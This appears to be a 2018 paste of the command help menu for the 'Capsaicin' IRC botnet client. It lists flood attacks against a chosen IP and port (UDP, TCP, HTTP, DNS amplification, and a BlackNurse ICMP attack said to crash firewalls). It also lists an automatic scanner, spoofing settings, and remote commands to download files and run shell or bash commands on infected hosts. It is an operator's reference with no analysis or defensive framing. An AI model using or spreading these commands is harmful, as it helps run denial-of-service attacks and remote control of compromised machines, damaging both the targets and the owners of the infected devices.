
Capsaicin botnet commands

Sep 24th, 2018
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  1. Non-spoof / non-root attacks: (can run on all bots)
  2. STD <ip> <port> <time> = A non spoof UDP HIV STD flooder
  3. HOLD <host> <port> <time> = A vanilla TCP connection flooder
  4. JUNK <host> <port> <time> = A vanilla TCP flooder (modded)
  5. UNKNOWN <target> <port, 0 for random> <packet size, 0 for random> <secs> = Another non-spoof udp flooder
  6. HTTP <method> <target> <port> <path> <time> <power> = An extremely powerful HTTP flooder
  8. Spoof / root attacks:
  9. DNS <target IP> <port> <reflection file url> <forks> <pps limiter, -1 for no limit> <time> = DNS amplification flooder, use with caution
  10. BLACKNURSE <target ip> <secs> = An ICMP flooder that will crash most firewalls, causing them to drop packets.
  12. Bot commands:
  13. AK47SCAN <ON/OFF> = Toggles scanner. Started automatically.
  14. RNDNICK = Randomizes knight nickname
  15. NICK <nick> = Changes the nick of the client
  16. SERVER <server> = Changes servers
  17. GETSPOOFS = Gets the current spoofing
  18. SPOOFS <subnet> = Changes spoofing to a subnet
  19. DISABLE = Disables all packeting from the knight
  20. ENABLE = Enables all packeting from the knight
  21. KILL = Kills the knight
  22. GET <http address> <save as> = Downloads a file off the web
  23. VERSION = Requests version of knight
  24. KILLALL = Kills all current packeting
  25. HELP = Displays this
  26. IRC <command> = Sends this command to the server
  27. SH <command> = Executes a command
  28. BASH <command> = Run a bash command
  29. ISH <command> = Interactive SH (via privmsg)
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